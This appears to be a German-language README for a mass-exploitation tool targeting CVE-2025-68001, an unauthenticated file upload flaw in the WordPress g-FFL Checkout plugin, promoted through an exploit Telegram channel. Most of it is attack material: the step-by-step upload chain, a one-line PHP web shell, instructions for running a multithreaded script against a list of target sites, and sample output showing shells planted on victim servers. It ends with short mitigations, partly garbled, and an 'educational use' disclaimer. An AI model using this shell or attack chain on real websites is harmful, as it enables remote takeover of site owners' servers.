
Das WordPress g-FFL Checkout Plugin <= 2.1.0 ist anfällig für einen Arbitrary File Upload mit hoher Priorität.
Das WordPress-Plugin g-FFL Checkout <= 2.1.0 ist anfällig für einen beliebigen Datei-Upload (Arbitrary File Upload) mit hoher Priorität
_ _ _ _ _ _ _ _ _ _
/ \ / |_ __ ) / \ ) |_ __ |_ (_) / \ / \ /|
\_ \/ |_ /_ \_/ /_ _) |_) (_) \_/ \_/ |
📡 Bleib der Zeit voraus. Tritt @KNxploited auf Telegram bei — deine exklusive Quelle für die neuesten CVEs, Zero-Days und modernste Exploit-Forschung. Ständig aktualisiert. Nicht für jeden.
CVE-2025-68001 ist eine kritische Schwachstelle für nicht authentifizierten beliebigen Datei-Upload (Unauthenticated Arbitrary File Upload), die im g-FFL Checkout-WordPress-Plugin von garidium entdeckt wurde.
Die Schwachstelle ermöglicht es einem nicht authentifizierten Remote-Angreifer, über die AJAX-Aktion ffl_upload_document beliebige Dateien — einschließlich Web-Shells — auf den Zielserver hochzuladen, was zu vollständiger Remote Code Execution (RCE) führt.
| Feld | Details |
|---|---|
| CVE-ID | CVE-2025-68001 |
| Plugin | g-FFL Checkout (g-ffl-checkout) |
| Betroffene Versionen | n/a bis einschließlich <= 2.1.0 |
| Schwachstellentyp | Unbeschränkter Datei-Upload |
| Auswirkung | Remote Code Execution (RCE) |
| Authentifizierung | Nicht erforderlich |
| CVSS-Schweregrad | Kritisch |
| Forscher | Nxploited |
Der Exploit folgt einer präzisen mehrstufigen Angriffskette:
1. GET /checkout
↓
Extract `checkout_nonce` from inline JavaScript data
2. POST /wp-admin/admin-ajax.php
action=ffl_upload_document
nonce=<extracted_nonce>
document_type=document
document=<shell.php disguised as image/png>
↓
Server stores the file without extension or MIME validation
3. Parse JSON response
↓
Extract uploaded file path / unique filename
4. Access uploaded shell via HTTP
↓
Remote Code Execution achieved ✔️
Das Plugin stellt einen AJAX-Endpunkt ffl_upload_document bereit, der:
Installiere alle Abhängigkeiten, bevor du das Skript ausführst:
pip install requests rich
| Abhängigkeit | Zweck |
|---|---|
requests | HTTP-Anfragen & Sitzungsverwaltung |
rich | Terminal-UI, Fortschrittsbalken, Panels |
threading | Multithreaded Zielverarbeitung |
Python 3.8+ ist erforderlich.
CVE-2025-68001/
├── CVE-2025-68001.py # Main exploit script
├── shell.php # Web shell to upload (you provide this)
├── list.txt # Target URLs (one per line)
└── success_results.txt # Auto-generated results output
Erstelle eine Datei list.txt mit einer Ziel-URL pro Zeile:
https://target1.com
https://target2.com
http://target3.com/wordpress
Das Skript fügt automatisch
http://hinzu, wenn kein Schema angegeben ist.
Lege deine PHP-Web-Shell in dasselbe Verzeichnis. Beispiel für eine minimale Shell:
<?php system($_GET['cmd']); ?>
Speichere sie als shell.php (oder unter einem beliebigen Namen — du wirst aufgefordert, ihn einzugeben).
python CVE-2025-68001.py
Du wirst interaktiv aufgefordert:
Enter targets file name (default: list.txt):
> list.txt
Enter shell file name to upload (default: shell.php):
> shell.php
Enter number of threads (default: 50):
> 20
Erfolgreiche Exploits werden automatisch in success_results.txt gespeichert:
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php
Jede Zeile enthält:
| Eingabeaufforderung | Standard | Beschreibung |
|---|---|---|
| Zieldatei | list.txt | Datei, die Ziel-URLs enthält |
| Shell-Datei | shell.php | PHP-Shell, die auf das Ziel hochgeladen werden soll |
| Anzahl der Threads | 50 | Parallele Worker (max: 50) |
✔ https://victim.com — /checkout reachable. Trying exploit...
┌─────────────────────────────────────────────────────┐
│ Success │
│ https://victim.com │
│ Original Name: shell.php │
│ Unique Name: a7f3c1d9e.php │
│ Stored Path: /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘
All targets processed ✔️. Results saved to: success_results.txt
Die Schwachstelle befindet sich im AJAX-Handler des Plugins, der ohne Berechtigungsprüfung registriert wird:
// No authentication or capability check
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');
function ffl_upload_document() {
// Nonce verified from /checkout page (publicly accessible)
// No MIME type validation
// No extension whitelist/blacklist
move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
wp_send_json_success(['file_path' => $upload_path]);
}
Wenn du Website-Betreiber oder Entwickler bist, ergreife sofort die folgenden Maßnahmen:
g-ffl-checkout auf eine gepatchte Version (> 2.1.0), falls verfügbar.htaccess-Regeln).php-DateienDIESES TOOL WIRD AUSSCHLIESSLICH FÜR BILDUNGSZWECKE UND AUTORISIERTE
SICHERHEITSFORSCHUNG BEREITGESTELLT.
Mit der Nutzung dieses Skripts stimmst du ausdrücklich Folgendem zu: